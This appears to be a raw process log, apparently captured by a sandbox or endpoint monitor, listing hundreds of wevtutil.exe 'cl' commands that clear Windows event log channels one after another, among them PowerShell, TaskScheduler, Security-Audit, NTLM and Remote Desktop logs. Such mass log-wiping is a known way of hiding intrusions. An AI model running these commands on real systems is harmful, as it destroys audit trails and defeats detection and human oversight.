C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventCollector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog-WMIProvider/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-EventLog/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FMS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FailoverClustering-Client/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Fault-Tolerant-Heap/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Feedback-Service-TriggerProvider

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-FileInfoMinifilter/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Firewall-CPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Forwarding/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Forwarding/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GettingStarted/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-GroupPolicy/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HAL/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenter/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenter/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HealthCenterCPL/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Help/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HomeGroup-ListenerService

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HotStart/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-HttpService/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IKE/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IKEDBG/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPBusEnum/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-IPSEC-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-International-RegionalOptionsControlPanel/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-International/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Iphlpsvc/Trace

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Acpi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Boot/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Disk/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-EventTracing/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-EventTracing/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-File/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Memory/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Network/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-PnP/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Thermal-Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Power/Thermal-Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Prefetch/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Process/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Processor-Power/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-Registry/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-StoreMgr/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-StoreMgr/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WDI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Errors

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Kernel-WHEA/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-L2NA/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LDAP-Client/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LUA-ConsentUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-LanguagePackSetup/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MCT/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-CLNT/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-DRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MPS-SRV/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MSPaint/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MUI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-MFReadWrite/Transform

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MediaFoundation-PlayAPI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MemoryDiagnostics-Results/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-MobilityCenter/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NCSI/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NCSI/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDF-HelperClassDiscovery/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS-PacketCapture/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NDIS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NTLM/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NWiFi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Narrator/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetShell/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Network-and-Sharing-Center/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkAccessProtection/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkAccessProtection/WHC

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkLocationWizard/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProfile/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NetworkProfile/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Networking-Correlation/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NlaSvc/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-NlaSvc/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OLEACC/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OLEACC/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OOBE-Machine/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OfflineFiles/SyncLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OneX/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-OobeLdr/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PCI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ParentalControls/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PeopleNearMe/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PortableDeviceStatusProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PortableDeviceSyncProvider/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerCfg/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerCpl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PowerShell/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrimaryNetworkIcon/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-PrintService/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Program-Compatibility-Assistant/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-QoS-Pacer/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-QoS-qWAVE/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC-Proxy/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RPC/EEInfo

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoost/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoost/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoostDriver/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReadyBoostDriver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Recovery/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ReliabilityAnalysisComponent/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteAssistance/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Remotefs-UTProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Detector/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Exhaustion-Resolver/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Resource-Leak-Diagnostic/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ResourcePublication/Tracing

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-RestartManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Search-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Search-ProtocolHandlers/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-Audit-Configuration-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-IdentityListener/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Security-SPP/Perf

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sens/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ServiceReportingApi/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Services-Svchost/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Services/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Setup/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupCl/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupQueue/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SetupUGC/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Common/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Core/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-DefaultPrograms/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-Shwebsvc

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shell-ZipFolder/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Shsvcs/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sidebar/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Speech-UserExperience/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Spell-Checking/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SpellChecker/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StickyNotes/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StickyNotes/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StickyNotes/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorDiag/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-StorPort/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Subsys-Csr/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Subsys-SMSS/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Superfetch/Main

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Superfetch/StoreLog

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Sysprep/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-SystemHealthAgent/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TCPIP/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msctf/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msctf/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msutb/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TSF-msutb/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TZUtil/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskScheduler/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TaskbarCPL/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-LocalSessionManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-MediaRedirection/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-PnPDevices/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RDPClient/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin

